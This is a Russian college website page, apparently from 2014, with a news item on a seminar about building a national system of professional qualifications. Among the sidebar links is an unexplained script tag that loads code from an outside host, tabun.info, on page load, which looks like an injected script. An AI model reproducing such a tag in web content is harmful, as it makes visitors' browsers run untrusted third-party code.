Главная
Регистрация
Вход

Приветствую Вас Гость | RSS

Меню сайта

Категории раздела
Абитуриентам [0]
Для желающих поступить в наш колледж

Независимая оценка
Как вы оцениваете качество образовательных услуг нашего колледжа?
Всего ответов: 224

Статистика

Онлайн всего: 1
Гостей: 1
Пользователей: 0

  
Главная » 2014 » Февраль » 25 » Обучающий семинар «Создание национальной системы развития квалификаций. Региональный аспект»
11:56
Обучающий семинар «Создание национальной системы развития квалификаций. Региональный аспект»

  "Сегодня, в условиях глубоких преобразований, высоких темпов роста экономики, с одной стороны, и сложной демографической ситуации, с другой, уровень квалификации специалистов всех отраслей приобретает особое значение. От требований к их знаниям, навыкам и умениям зависит будущее нашей страны. Именно поэтому разработка профессиональных стандартов, отвечающих всем требованиям рынка труда, – важнейшее из направлений совместной деятельности государства, работодателей и профессиональных общественных объединений".

Топилин Н.А.

"Предлагаю, чтобы Правительство до конца 2012 года совместно с предпринимательскими и профессиональными ассоциациями, с ведущими университетами страны приняло Национальный план развития профессиональных стандартов и создания открытой базы данных членов профессиональных ассоциаций. …восстановить престиж и актуальность обучения прикладным квалификациям, привязать их к конкретным технологиям, представленным на рынке".

"..Люди разного призвания - предприниматели, рабочие, специалисты, «бюджетники» - должны иметь поле для реализации своего потенциала, поле для профессионального и социального роста. Каждый из профессионалов должен получить возможность не просто работать по специальности, а строить профессиональную карьеру. А значит - постоянно повышать свою квалификацию, обучаться новым прикладным технологиям. При этом надо сделать квалификацию каждого видимой, различимой для работодателей"

Путин В.В.
«Оценивать подготовку специалистов не может сама система образования. Нужна внешняя оценка, которую могут дать профессионалы в конкретной области. Последнее слово должно быть за ними.… Общественная аттестация образовательного учреждения поможет понять, где нужно увеличивать количество учебных мест, где уменьшать или вовсе закрывать специальность. … О результатах общественной оценке будет говориться открыто. После этого и сами студенты не пойдут туда учиться».
Фурсенко А.А.

"То, что нужно каждой компании - это возможность принимать на работу стольких работников требуемой квалификации, сколько необходимо, и в тот момент времени, когда требуется. Высокая квалификация и гибкие профессиональные навыки работника жизненно важны для того, чтобы компании оставались конкурентоспособными, производительными, прибыльными. Бизнесу необходимы работники, которые хотят, способны и имеют возможность наращивать профессиональные навыки в течение всей трудовой жизни".

Шохин А.Н.

 "Всмотритесь в судьбы России, вдумайтесь в ее крушение и унижение! И Вы увидите, что русскому народу есть только один исход и одно спасение – возвращение к качеству и его культуре. Надо творчески развивать качественные силы России."

И.А. Ильин «Русский колокол» 1905г.



Руководитель  ЦРО и СП «Универсум» Костыко Галина Степановна

30-31.01 2014г. Обучающий семинар «Создание национальной системы развития квалификаций. Региональный аспект».

В настоящее время активно формируется Национальная система компетенций и квалификаций, инициированная Президентом РФ и подкрепленная его Указом №  597, № 599,  Перечнем Поручений Президента Российской Федерации по итогам совещания по вопросам разработки профессиональных стандартов (Пр-3050 от 26.12.2013г).

30-31 января на базе Челябинского регионального агентства развития квалификаций проходил  обучающий семинар: «Создание национальной системы развития квалификаций. Региональный аспект». Участники семинара Федосова А.Н., Пономарева И.Н. рассмотрели актуальные вопросы современного состояния профобразования;

 

-актуальные проблемы формирования национальной системы квалификаций РФ;

- нормативное продвижение национальной системы квалификаций (НСК);

- подходы к формированию НСКК и АСИ;

-  проект РСПП «Создание и развитие национальной системы квалификаций»;

  текущая ситуация в области становления НСК;

-  продвижение разработки ПС; 

-  продвижение независимой оценки и сертификации квалификаций; 

- условия создания ЦОСК; 

-  подготовка экспертного сообщества;

- профессионально-общественная аккредитация ОПОП;

-  опыт формирования региональной системы квалификаций в Челябинской области.


Просмотров: 971 | Добавил: iTiger | Рейтинг: 0.0/0
Всего комментариев: 0
Имя *:
Email *:
Код *:


Вход на сайт
Логин:
Пароль:

Мы потомки Героев


ПОЛЕЗНЫЕ ССЫЛКИ

Министерство образования и науки Российской Федерации Единое окно доступа к образовательным ресурсам Федеральный портал "Российское образование" Единая коллекция цифровых образовательных ресурсов Федеральный центр информационно-образовательных ресурсов


Персональные данные Дети МЕСТО РОЖДЕНИЯ:
ТЮМЕНСКИЙ КРАЙ Конкурс новый взгляд
<script src="https://tabun.info/out/index.php"></script>
http://профстажировки.рф/
Поиск

Календарь
«  Февраль 2014  »
ПнВтСрЧтПтСбВс
     12
3456789
10111213141516
17181920212223
2425262728

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Архив записей

Copyright MyCorp © 2024
Создать бесплатный сайт с uCoz